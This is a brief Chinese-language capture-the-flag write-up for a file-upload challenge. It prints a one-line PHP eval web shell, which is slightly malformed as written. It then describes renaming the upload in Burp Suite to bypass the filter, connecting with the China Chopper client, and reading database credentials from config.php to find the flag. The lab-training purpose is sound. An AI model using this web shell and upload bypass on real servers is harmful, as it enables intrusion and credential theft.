來一波原理:
eval() 函數把字符串按照 PHP 代碼來計算。該字符串必須是合法的 PHP 代碼,且必須以分號結尾。如果沒有在代碼字符串中調用 return 語句,則返回 NULL。如果代碼中存在解析錯誤,則 eval() 函數返回 false
<?php @eval($_POST(‘1’);?>
各種繞過文件上傳的姿勢:https://blog.csdn.net/wy_97/article/details/76549761
如果你已經成功上傳了一個一句話木馬文件,那么現在就可以使用菜刀鏈接了
具體的步驟就是右鍵添加;輸入url加上上傳路徑及上傳文件,具體的可以參考這個例題:
題目鏈接:https://www.ichunqiu.com/battalion?t=1&r=0
解題步驟
- 打開網頁我們發現需要上傳一個文件我們先嘗試上傳名為1.php的文件(本文件夾中)
此時我們將1.php文件擴展名改為1.jpg然后打開burpsuite抓包抓包之后我們將文件名改為1.php
然后點擊forward
發現文件上傳成功
- 我們利用中國菜刀連接目標服務器
菜刀連接上去在里面發現了數據庫配置文件config.php,看到了數據庫賬號密碼
編輯菜刀連接數據庫上去拿到flag
然后右鍵點擊數據庫管理進入到頁面在頁面上方輸入sql語句尋找包含flag的文件
